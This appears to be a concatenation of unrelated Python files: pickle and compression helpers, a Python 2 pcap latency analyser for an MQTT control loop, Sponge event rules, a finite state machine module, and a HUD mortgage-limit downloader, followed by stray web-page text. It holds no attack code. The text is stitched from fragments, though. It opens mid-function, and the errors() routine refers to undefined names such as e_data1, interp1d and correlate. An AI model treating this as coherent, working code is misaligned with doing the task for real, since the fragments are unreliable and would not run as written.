print('Unique items:',len(set(items)))
return len(items) == len(set(items))
# ~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<
# Storage & COMPRESSION FUNCTIONS <~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~
# ~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<
# Article on pickling and compressed pickling functions
# https://betterprogramming.pub/load-fast-load-big-with-compressed-pickles-5f311584507e
def full_pickle(title, data):
'''pickles the submited data and titles it'''
pikd = open(title + '.pickle', 'wb')
pickle.dump(data, pikd)
pikd.close()
def loosen(file):
'''loads and returns a pickled objects'''
pikd = open(file, 'rb')
data = pickle.load(pikd)
pikd.close()
return data
def compressed_pickle(title, data):
'''
Pickle a file and then compress it into a file with extension .pbz2
__________
parameters
- title : title of the file you want to save (will be saved with .pbz2 extension automatically)
- data : object you want to save
'''
with bz2.BZ2File(title + '.pbz2', 'w') as f:
pickle.dump(data, f)
def decompress_pickle(filename):
'''filename - file name including .pbz2 extension'''
data = bz2.BZ2File(filename, 'rb')
data = pickle.load(data)
return data
# ~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<
# Time Management FUNCTIONS <~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~
# ~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<~<
# Time Stuff
def cuttomin(x):
'''Cut a time stamp at the minutes (exclude seconds or more precise)'''
return datetime.strftime(x, '%m-%d %H:%M')
def cuttohrs(x):
'''Cut a time stamp at the hours (exclude minutes or more precise)'''
return datetime.strftime(x, '%m-%d %H')
def cuttodays(x):
'''Cut a time stamp at the date (exclude hour or more precise)'''
return datetime.strftime(x, '%y-%m-%d')
def datetime_range(start, end, delta):
'''Returns the times between start and end in steps of delta'''
current = start
while current < end:
yield current
current += delta
def prev_weekday(adate):
'''Returns the date of the last weekday before the given date'''
adate -= timedelta(days=1)
while adate.weekday() > 4: # Mon-Fri are 0-4
adate -= timedelta(days=1)
return adate
|
#!/usr/bin/env python
''' Access will always be in control values (maybe value?) '''
import pickle
from matplotlib import use
use('TkAgg')
from matplotlib import rcParams
rcParams['ps.useafm'] = True
rcParams['pdf.use14corefonts'] = True
from matplotlib.pyplot import gca, grid, subplots_adjust,figure, xlabel, ylabel, title, savefig, show, legend, subplot, boxplot, axes, hist, savefig, xlim, ylim, plot, hist2d, axis, close as figclose
from matplotlib.colors import LogNorm
from numpy import median, arange, zeros, searchsorted, genfromtxt, argsort, diff, sqrt, where, cos, sin, fmod, mean, array, pi, isnan, vstack, hstack
from sys import argv
from time import time as clock
from math import sin, cos, sqrt, asin, isnan, isinf, pi
import dpkt
import datetime
import socket
import cStringIO
import string
from re import search
from operator import itemgetter
from sys import exc_info
ykernel = 'butterfly2';yamplitude = 2.0;yfrequency = 1.0/100.00;psikernel = 'butterfly1';psiamplitude = 0*pi/180;psifrequency = 1.0/125.0;xkernel = 'butterfly1';xamplitude = 2.0;xfrequency = 1.0/100.00
#Reference function -- gets reference at a time t
def ref(time,kernel,amplitude,frequency):
if kernel == 'butterfly1':
val = amplitude*cos(2*pi*time*frequency)*sin(4*pi*time*frequency);
elif kernel == 'butterfly2':
val = amplitude*cos(2*pi*time*frequency)*sin(2*pi*time*frequency);
elif kernel == 'square':
if sin(frequency*2*pi*time) < 0:
val = -amplitude;
else:
val = amplitude;
elif kernel == 'sin':
val = amplitude*sin(frequency*2*pi*time);
elif kernel == 'cos':
val = amplitude*cos(frequency*2*pi*time);
return val
def process(filename):
data = genfromtxt(filename, skip_header=1, skip_footer=1,invalid_raise=False)
sorted_indices = argsort(data[:,5])
data = data[sorted_indices,:]
#d0max=searchsorted(data[:,0],[00,7100], side='left')
#data = data[d0max[0]+1:d0max[1],:]
#data = array([i for i in data if not isnan(i[1])])
return data
broker_ip = "172.16.31.10"
host_ip = "192.168.0.6"
def ip_to_str(address):
"""Print out an IP address given a string
Args:
address: the string representation of a MAC address
Returns:
printable IP address
"""
return socket.inet_ntop(socket.AF_INET, address)
# def isclose(a, b, allowed_error = .001):
# return abs(a - b) <= allowed_error
def remove_duplicates(seq):
final_list = []
seen = set()
seen_add = seen.add
for item in seq:
time = round(item[0], 2)
if time not in seen:
final_list.append(item)
seen_add(time)
sorted_indices = argsort([i[0] for i in final_list])
final_list = [final_list[i] for i in sorted_indices]
return final_list
def analyzetcp(capturefile, remote='172.16.58.3'):
## custom code to recognize data to and from 172.16.58.3
f = open(capturefile)
pcap = dpkt.pcap.Reader(f)
state_list = []
control_list = []
times = []
t0 = None
for ts, buf in pcap:
eth = dpkt.ethernet.Ethernet(buf)
if t0 is None: t0 = datetime.datetime.utcfromtimestamp(ts) ;
# IP object includes information such as IP Address
ip = eth.data;
if type(ip.data) is dpkt.tcp.TCP:
#print ts, len(buf), ip.data.data, socket.inet_ntoa(ip.src), socket.inet_ntoa(ip.dst)
try:
# This includes TCP header information
tcp = ip.data;
# if "]" in tcp.data and "value" not in tcp.data and " " in tcp.data:
if socket.inet_ntoa(ip.src) in remote and "value" in tcp.data and "&t=" in tcp.data:
#print tcp.data
#print 'Timestamp: ', str(datetime.datetime.utcfromtimestamp(ts)) , 'IP: %s -> %s (len=%d, syn=%d, ack=%d)' % (ip_to_str(ip.src), ip_to_str(ip.dst), ip.len, syn_flag, ack_flag)
#print tcp.data
time = tcp.data.rsplit("t=")[1].rsplit("&")[0]
control_list.append([float(time), datetime.datetime.utcfromtimestamp(ts) - t0])
elif socket.inet_ntoa(ip.src) in remote and "value" in tcp.data and "&time=" in tcp.data:
#print tcp.data
#print 'Timestamp: ', str(datetime.datetime.utcfromtimestamp(ts)) , 'IP: %s -> %s (len=%d, syn=%d, ack=%d)' % (ip_to_str(ip.src), ip_to_str(ip.dst), ip.len, syn_flag, ack_flag)
#print tcp.data
time = tcp.data.rsplit("time=")[1].rsplit("&")[0];
control_list.append([float(time), datetime.datetime.utcfromtimestamp(ts) - t0])
elif socket.inet_ntoa(ip.dst) in remote and len(tcp.data)> 20 and ']' in tcp.data and "value" not in tcp.data :
m = search('\[(.+?) (.+?) (.+?) (.+?) (.+?)\](.+?)\[(.+?) (.+?) (.+?) (.+?) (.+?)\]', tcp.data)
if m:
if len(m.groups()) == 11:
time = m.group(5).split()[-1]
state_list.append([float(time), datetime.datetime.utcfromtimestamp(ts) - t0])
time = m.group(11).split()[-1]
state_list.append([float(time), datetime.datetime.utcfromtimestamp(ts) - t0])
else:
print "should be long", tcp.data
else:
m = search('\[(.+?) (.+?) (.+?) (.+?) (.+?)\]', tcp.data)
if m:
time = m.groups()[-1].split()[-1];
state_list.append([float(time), datetime.datetime.utcfromtimestamp(ts) - t0])
#else:
# print "should be short", tcp.data
#else:
#print "don't know", tcp.data, socket.inet_ntoa(ip.dst)
except :
print tcp.data, "error!", exc_info(),"\n";
else: #packet is not a TCP packet
pass
'''
figure(101)
mydat=array([ (i[1]-control_list[0][1]).total_seconds() for i in control_list])
latency = mydat- arange(0,round(len(mydat)*.2,2),.2)
hist(latency - min(latency), 100, log=True);xlim([-.1,.6]);ylim([1,37000]);grid("on",which="both");
xlabel('Relative latency in control request (s)')
savefig(capturefile.replace("/","_")[3:-3]+"eps" , format='eps')
figclose(101)
'''
state_list = remove_duplicates(state_list)
control_list = remove_duplicates(control_list)
state_count, control_count = 0,0
while state_count < len(state_list) and control_count < len(control_list):
#print state_list[state_count][0], control_list[control_count][0]
if state_list[state_count][0] == control_list[control_count][0]:
delta = state_list[state_count][1] - control_list[control_count][1]
times.append([delta,state_list[state_count][0],state_list[state_count][1], control_list[control_count][1]])
state_count+=1
control_count+=1
elif state_list[state_count][0] > control_list[control_count][0]:
times.append([float("inf"),state_list[state_count][0],state_list[state_count][1], control_list[control_count][1]])
control_count+=1
elif state_list[state_count][0] < control_list[control_count][0]:
times.append([float("inf"),state_list[state_count][0],state_list[state_count][1], control_list[control_count][1]])
state_count+=1
f.close()
return times;
def errors(data):
number=16
q=array([item for item in data[0:2000,:] if not isnan(item[1])]);xnew=arange(q[0,0]+.01,q[-1,0],.01);ius=interp1d(q[:,0],q[:,2], kind='linear', axis=-1, copy=True, bounds_error=True);ynew1=ius(xnew);ius=interp1d(q[:,0],q[:,7], kind='linear', axis=-1, copy=True, bounds_error=True); ynew2=ius(xnew);xcorr = correlate(ynew1,ynew2);datadt=arange(1-xnew.shape[0],xnew.shape[0])[xcorr.argmax()];
e_data0 = array([[item[0]-datadt*.01,item[1] - ref(item[0]-datadt*.01,xkernel ,xamplitude ,xfrequency) ,item[2] - ref(item[0]-datadt*.01,ykernel ,yamplitude ,yfrequency)] for item in data if not isnan(item[1])]);
#e_data1 = array([[item[14]-datadt*.01,item[1] - ref(item[14]-datadt*.01,xkernel ,xamplitude ,xfrequency) ,item[2] - ref(item[14]-datadt*.01,ykernel ,yamplitude ,yfrequency)] for item in data if not isnan(item[1])]);
errors = [None]*number;
counts = [None]*number;
for count in range(1,number+1):
#get the range of indices that are relevant for this loop
d0max=searchsorted(e_data0[:,0],[.1+100*count,.1+100*count+100], side='left');
'''since the controller can get delayed, it's possible that the time is off by a cycle.. and instead of the 0 index, the 14 index has the correct time.
To work around this issue we take the minimum error of both time calculations.
'''
#errors[count-1] = sum(abs(data[d0max[0]:d0max[1],1]))/diff(d0max)+sum(abs(data[d0max[0]:d0max[1],2]))/diff(d0max); #old value not correct for some cases
errors[count-1] = min(sum(abs(e_data0[d0max[0]:d0max[1],1]))/diff(d0max)+sum(abs(e_data0[d0max[0]:d0max[1],2]))/diff(d0max),sum(abs(e_data1[d0max[0]:d0max[1],1]))/diff(d0max)+sum(abs(e_data1[d0max[0]:d0max[1],2]))/diff(d0max))
counts[count-1] = d0max[1]-d0max[0];
e_data=errors;
e_datac=counts;
return e_data, e_datac
if __name__ == "__main__":
path = argv[1]
controller1_l5=process(path+"/mqtt_bar_control_action__1__plant_state__1.txt");
controller1_l4=analyzetcp(path+'/Controller.pcap','10.0.0.3');
hist([i[0].total_seconds() for i in controller1_l4 if type(i[0]) is not float],100);
grid("on",which="both");#xlim([0,.8]);ylim([0,1e5])
title("Histogram of the Transport Layer RTT n="+str(len(controller1_l4)))
figure();plot(controller1_l5[:,0],controller1_l5[:,1]);plot(controller1_l5[:,0],controller1_l5[:,6]);title("x-axis");legend(["actual","target"])
figure();plot(controller1_l5[:,0],controller1_l5[:,2]);plot(controller1_l5[:,0],controller1_l5[:,7]);title("y-axis");legend(["actual","target"])
show()
|
"""
Sponge Knowledge Base
Using rules - immediate, duration
"""
from org.openksavi.sponge.examples.util import CorrelationEventsLog
from org.openksavi.sponge.core.event import EventId
def onInit():
global defaultDuration, correlationEventsLog
defaultDuration = 2
# Variables for assertions only
correlationEventsLog = CorrelationEventsLog()
sponge.setVariable("correlationEventsLog", correlationEventsLog)
def runRule(rule):
rule.logger.debug("Sequence: {}", SpongeUtils.getAbbreviatedEventSequenceString(rule))
global correlationEventsLog
correlationEventsLog.addEvents(rule.meta.name, rule)
# Naming F(irst), L(ast), A(ll), N(one)
# F(irst)F(irst)F(irst)
class RuleFFF(Rule):
def onConfigure(self):
self.withEvents(["e1", "e2", "e3 :first"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
# F(irst)F(irst)L(ast)
class RuleFFL(Rule):
def onConfigure(self):
self.withEvents(["e1", "e2", "e3 :last"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
# F(irst)F(irst)A(ll)
class RuleFFA(Rule):
def onConfigure(self):
self.withEvents(["e1", "e2", "e3 :all"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
# F(irst)F(irst)N(one)
class RuleFFN(Rule):
def onConfigure(self):
self.withEvents(["e1", "e2", "e4 :none"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
# F(irst)L(ast)F(irst)
class RuleFLF(Rule):
def onConfigure(self):
self.withEvents(["e1", "e2 :last", "e3 :first"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
# F(irst)L(ast)L(ast)
class RuleFLL(Rule):
def onConfigure(self):
self.withEvents(["e1", "e2 :last", "e3 :last"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
# F(irst)L(ast)A(ll)
class RuleFLA(Rule):
def onConfigure(self):
self.withEvents(["e1", "e2 :last", "e3 :all"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
# F(irst)L(ast)N(one)
class RuleFLN(Rule):
def onConfigure(self):
self.withEvents(["e1", "e2 :last", "e4 :none"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
# F(irst)A(ll)F(irst)
class RuleFAF(Rule):
def onConfigure(self):
self.withEvents(["e1", "e2 :all", "e3 :first"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
# F(irst)A(ll)L(ast)
class RuleFAL(Rule):
def onConfigure(self):
self.withEvents(["e1", "e2 :all", "e3 :last"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
# F(irst)A(ll)A(ll)
class RuleFAA(Rule):
def onConfigure(self):
self.withEvents(["e1", "e2 :all", "e3 :all"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
# F(irst)A(ll)N(one)
class RuleFAN(Rule):
def onConfigure(self):
self.withEvents(["e1", "e2 :all", "e5 :none"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
# F(irst)N(one)F(irst)
class RuleFNF(Rule):
def onConfigure(self):
self.withEvents(["e1", "e5 :none", "e3"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
# F(irst)N(one)L(ast)
class RuleFNL(Rule):
def onConfigure(self):
self.withEvents(["e1", "e5 :none", "e3 :last"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
# F(irst)N(one)A(ll)
class RuleFNA(Rule):
def onConfigure(self):
self.withEvents(["e1", "e5 :none", "e3 :all"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
class RuleFNFReject(Rule):
def onConfigure(self):
self.withEvents(["e1", "e2 :none", "e3"])
global defaultDuration
self.withDuration(Duration.ofSeconds(defaultDuration))
def onRun(self, event):
runRule(self)
def onStartup():
sponge.event("e1").set("label", "1").send()
sponge.event("e2").set("label", "2").send()
sponge.event("e2").set("label", "3").send()
sponge.event("e3").set("label", "4").send()
sponge.event("e2").set("label", "5").send()
sponge.event("e3").set("label", "6").send()
sponge.event("e3").set("label", "7").send()
|
# -*- coding: utf-8 -*-
#
# Finite State Machine
#
# Written in 2021 by Moky <<EMAIL>>
#
# ==============================================================================
# MIT License
#
# Copyright (c) 2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ==============================================================================
import weakref
from abc import ABC
from typing import List, Optional, Dict
from .machine import S, C, U, T
from .machine import Transition, State, Machine, Status, Delegate
class BaseTransition(Transition[C], ABC):
""" Transition with the name of target state """
def __init__(self, target: str):
super().__init__()
self.__target = target
@property
def target(self) -> str:
""" target state name """
return self.__target
class BaseState(State[C, T], ABC):
""" State with transitions """
def __init__(self):
super().__init__()
self.__transitions: List[T] = []
def add_transition(self, transition: T):
assert transition not in self.__transitions, 'transition exists'
self.__transitions.append(transition)
# Override
def evaluate(self, ctx: C) -> Optional[T]:
for trans in self.__transitions:
if trans.evaluate(ctx):
# OK, get target state from this transition
return trans
class BaseMachine(Machine[C, T, S]):
def __init__(self, default: str):
super().__init__()
self.__default = default
self.__current: Optional[S] = None
self.__states: Dict[str, S] = {} # name(str) => State
self.__delegate: Optional[weakref.ReferenceType] = None
self.__status: Status = Status.STOPPED
@property
def delegate(self) -> Delegate[C, T, S]:
ref = self.__delegate
if ref is not None:
return ref()
@delegate.setter
def delegate(self, handler: Delegate[C, T, S]):
if handler is None:
self.__delegate = None
else:
self.__delegate = weakref.ref(handler)
@property
def context(self) -> C:
raise NotImplemented
#
# States
#
def add_state(self, name: str, state: S):
self.__states[name] = state
def get_state(self, name: str) -> S:
return self.__states.get(name)
@property # Override
def default_state(self) -> S:
return self.__states.get(self.__default)
@property # Override
def current_state(self) -> S:
return self.__current
@current_state.setter # Override
def current_state(self, state: S):
self.__current = state
# Override
def target_state(self, transition: BaseTransition[C]) -> S:
return self.__states.get(transition.target)
# Override
def change_state(self, state: Optional[S]):
machine = self.context
old = self.current_state
delegate = self.delegate
# events before state changed
if delegate is not None:
delegate.enter_state(state, machine)
if state is not None:
state.on_enter(machine)
# change state
self.current_state = state
# events after state changed
if delegate is not None:
delegate.exit_state(old, machine)
if old is not None:
old.on_exit(machine)
#
# Actions
#
# Override
def start(self):
self.change_state(state=self.default_state)
self.__status = Status.RUNNING
# Override
def stop(self):
self.__status = Status.STOPPED
self.change_state(state=None)
# Override
def pause(self):
machine = self.context
current = self.current_state
# events before state paused
delegate = self.delegate
if delegate is not None:
delegate.pause_state(current, machine)
current.on_pause(machine)
# pause state
self.__status = Status.PAUSED
# Override
def resume(self):
machine = self.context
current = self.current_state
# reuse state
self.__status = Status.RUNNING
# events after state resumed
delegate = self.delegate
if delegate is not None:
delegate.resume_state(current, machine)
current.on_resume(machine)
#
# Ticker
#
# Override
def tick(self):
machine = self.context
current = self.current_state
if current is not None and self.__status == Status.RUNNING:
trans = current.evaluate(machine)
if trans is not None:
# assert isinstance(trans, BaseTransition), 'transition error: %s' % trans
target = self.target_state(transition=trans)
assert target is not None, 'target state error: %s' % trans.target
self.change_state(state=target)
|
import datetime
import os
from collections import OrderedDict
import requests
from unicodecsv import DictReader
from unicodecsv import writer as Writer
ERROR_MSG = "Script failed to process all files."
API_DIR = os.path.abspath(
os.path.dirname(os.path.dirname(__file__))
)
DATA_DIR = "{}/data".format(API_DIR)
CSV_DIR = "{}/base_data".format(DATA_DIR)
CHUMS_FHA_URL = 'https://www.hud.gov/pub/chums/cy{}-forward-limits.txt'
CHUMS_GSE_URL = 'https://www.hud.gov/pub/chums/cy{}-gse-limits.txt'
CHUMS_SPACING = [
('msa-code', (0, 5)),
('metro-code', (5, 10)),
('metro-name', (10, 60)),
('program', (60, 65)),
('limit-type', (65, 66)), # S or H, standard or high
('median-price', (66, 73)),
('limit-1-unit', (73, 80)),
('limit-2-units', (80, 87)),
('limit-3-units', (87, 94)),
('limit-4-units', (94, 101)),
('state', (101, 103)),
('county-fips', (103, 106)),
('state-name', (106, 132)),
('county-name', (132, 147)),
('county-transaction-date', (147, 155)),
('limit-transaction-date', (155, 163)),
('median-price-determining-limit', (163, 170)),
('year-for-median-determining-limit', (170, 175))
]
CHUMS_MAP = OrderedDict(CHUMS_SPACING)
FINAL_FIELDNAMES = [
u'State',
u'State FIPS',
u'County FIPS',
u'Complete FIPS',
u'County Name',
u'GSE limit',
u'FHA limit',
u'VA limit'
]
def load_FIPS():
with open('{}/county_FIPS.csv'.format(CSV_DIR), 'rU') as f:
reader = DictReader(f)
return [row for row in reader]
def translate_data(data_list, data_map):
rows = []
for line in data_list:
rows.append(
{key: line[data_map[key][0]:data_map[key][1]].strip()
for key in data_map}
)
return rows
def download_datafile(url):
response = requests.get(url)
if response.ok:
return response.text
else:
return "Error:\n{} {}\n{}".format(
response.status_code,
response.reason,
response.url)
def dump_to_csv(filepath, headings, data):
with open(filepath, 'w') as f:
fieldnames = [key for key in headings]
writer = Writer(f)
writer.writerow(fieldnames)
for row in data:
writer.writerow(
[row[key] for key in headings]
)
def assemble_final_data(fha_data, gse_data):
final_data = []
county_data = load_FIPS()
county_by_fips = {row['Complete FIPS']: row for row in county_data}
states = sorted(set(row['State'] for row in county_data))
state_fips = {state: '' for state in states}
for state in states:
for row in county_data:
if row['State'] == state:
state_fips[state] = row['State ANSI']
continue
for row in fha_data:
if row['state'] and row['county-fips']:
FIPS = state_fips[row['state']] + row['county-fips']
final_data.append({
u'State': row['state'],
u'State FIPS': state_fips[row['state']],
u'County FIPS': row['county-fips'],
u'Complete FIPS': FIPS,
u'County Name': county_by_fips[FIPS]['County Name'],
u'GSE limit': None,
u'FHA limit': int(row['limit-1-unit']),
u'VA limit': None
})
gse_by_fips = {}
for row in gse_data:
if row['state'] and row['county-fips']:
FIPS = state_fips[row['state']] + row['county-fips']
gse_by_fips[FIPS] = int(row['limit-1-unit'])
for row in final_data:
limit = gse_by_fips[row['Complete FIPS']]
row['GSE limit'] = limit
row['VA limit'] = limit
return final_data
def get_chums_data(year=None):
"""
Downloads and processes mortgage data files for the next year.
Normally, updates are run in December preceding the new data year,
so the default year is current year + 1.
If updates need to be run for the current year, or any other year,
then pass in your desired 'year' value.
Files are available manually
at https://www.hud.gov/pub/chums/file_layouts.html
"""
year = year or datetime.date.today().year + 1
msg = ''
try:
fha = download_datafile(CHUMS_FHA_URL.format(year)).split('\r\n')
if fha[0].startswith("Error"):
msg += fha[0]
raise ValueError(fha[0])
fha_data = translate_data(fha, CHUMS_MAP)
dump_to_csv(
'{}/forward_limits_{}.csv'.format(CSV_DIR, year),
CHUMS_MAP.keys(),
fha_data)
msg += ('FHA limits saved to {}/forward_limits_{}.csv\n'.format(
CSV_DIR, year))
gse = download_datafile(CHUMS_GSE_URL.format(year)).split('\r\n')
if gse[0].startswith("Error"): # pragma: no cover tested above
msg += gse[0]
raise ValueError(gse[0])
gse_data = translate_data(gse, CHUMS_MAP)
gse_file = '{}/gse_limits_{}.csv'.format(CSV_DIR, year)
dump_to_csv(gse_file, CHUMS_MAP.keys(), gse_data)
msg += 'GSE limits saved to {}\n'.format(gse_file)
final_data = assemble_final_data(fha_data, gse_data)
yearly_file = '{}/county_limit_data_flat_{}.csv'.format(CSV_DIR, year)
final_file = '{}/county_limit_data_latest.csv'.format(DATA_DIR)
dump_to_csv(yearly_file, FINAL_FIELDNAMES, final_data)
dump_to_csv(final_file, FINAL_FIELDNAMES, final_data)
msg += ('Final flat file saved to {}\n'.format(final_file))
msg += ("All county source files processed.\n"
"Data can be loaded with this command: \n"
"`python manage.py load_county_limits "
"data/county_limit_data_latest.csv --confirm=y`")
except Exception:
return "{}\n{}".format(ERROR_MSG, msg)
return msg
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.